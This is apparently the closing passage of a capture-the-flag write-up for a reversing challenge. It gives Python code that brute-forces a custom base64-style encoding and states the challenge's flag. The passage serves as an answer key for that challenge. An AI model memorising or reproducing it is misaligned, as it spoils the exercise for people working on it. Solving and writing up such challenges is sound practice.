<p>The function is similar to the reversing challenge <strong>Math</strong>, but without a key. The flag can be obtained by replicating the function above and brute-forcing for the flag. This method tries every possible combination for every block of 3 characters in the flag, which can be done in reasonable time.</p>

<p>Here’s the final code to solve the challenge:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="n">final</span> <span class="o">=</span> <span class="p">[</span><span class="mi">86</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">108</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">82</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">101</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">82</span><span class="p">,</span> <span class="mi">108</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">122</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">119</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">86</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">101</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">108</span><span class="p">,</span> <span class="mi">85</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">97</span><span class="p">,</span> <span class="mi">84</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">117</span><span class="p">,</span> <span class="mi">88</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">103</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">98</span><span class="p">,</span> <span class="mi">109</span><span class="p">,</span> <span class="mi">82</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">88</span><span class="p">,</span> <span class="mi">74</span><span class="p">,</span> <span class="mi">57</span><span class="p">]</span>
<span class="n">alphabets</span> <span class="o">=</span> <span class="s">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"</span>
<span class="n">chars</span> <span class="o">=</span> <span class="s">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_\{\}"</span> 

<span class="k">print</span> <span class="nb">len</span><span class="p">(</span><span class="n">final</span><span class="p">)</span>

<span class="n">flag</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">count</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">for</span> <span class="n">trip</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="nb">len</span><span class="p">(</span><span class="n">final</span><span class="p">),</span><span class="mi">2</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">fi</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">se</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">:</span>
            <span class="k">for</span> <span class="n">th</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">:</span>
                <span class="n">a</span> <span class="o">=</span> <span class="p">((</span><span class="nb">ord</span><span class="p">(</span><span class="n">fi</span><span class="p">)</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span> <span class="o">|</span> <span class="nb">ord</span><span class="p">(</span><span class="n">se</span><span class="p">))</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span> <span class="o">|</span> <span class="nb">ord</span><span class="p">(</span><span class="n">th</span><span class="p">))</span>
                
                <span class="n">test</span> <span class="o">=</span> <span class="p">[]</span>

                <span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
                    <span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
                    <span class="k">for</span> <span class="n">m</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
                        <span class="k">if</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="n">m</span><span class="o">+</span><span class="n">k</span><span class="o">*</span><span class="mi">6</span> <span class="o">&amp;</span> <span class="mh">0x1f</span><span class="p">)</span> <span class="o">&amp;</span> <span class="n">a</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">):</span>
                            <span class="n">t</span> <span class="o">=</span> <span class="n">t</span> <span class="o">|</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="n">m</span> <span class="o">&amp;</span> <span class="mh">0x1f</span><span class="p">))</span>
                    <span class="n">test</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">alphabets</span><span class="p">[</span><span class="n">t</span><span class="p">])</span>

                <span class="k">if</span> <span class="nb">chr</span><span class="p">(</span><span class="n">final</span><span class="p">[</span><span class="n">count</span><span class="p">])</span> <span class="o">==</span> <span class="n">test</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="ow">and</span> <span class="nb">chr</span><span class="p">(</span><span class="n">final</span><span class="p">[</span><span class="n">count</span><span class="o">+</span> <span class="mi">1</span><span class="p">])</span> <span class="o">==</span> <span class="n">test</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="ow">and</span> <span class="nb">chr</span><span class="p">(</span><span class="n">final</span><span class="p">[</span><span class="n">count</span><span class="o">+</span><span class="mi">2</span><span class="p">])</span> <span class="o">==</span> <span class="n">test</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="ow">and</span> <span class="nb">chr</span><span class="p">(</span><span class="n">final</span><span class="p">[</span><span class="n">count</span><span class="o">+</span><span class="mi">3</span><span class="p">])</span> <span class="o">==</span> <span class="n">test</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span>
                    <span class="k">print</span> <span class="n">fi</span> <span class="o">+</span> <span class="n">se</span> <span class="o">+</span> <span class="n">th</span>
                    <span class="n">flag</span> <span class="o">+=</span> <span class="n">fi</span> <span class="o">+</span> <span class="n">se</span> <span class="o">+</span> <span class="n">th</span>
                    <span class="k">break</span>

    <span class="n">count</span> <span class="o">+=</span> <span class="mi">2</span>

<span class="k">print</span> <span class="n">flag</span>
</code></pre></div></div>

<p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TIMCTF{deC3pt1ve_ExceP0ti0n_h4ndLer}</code></p>
:ET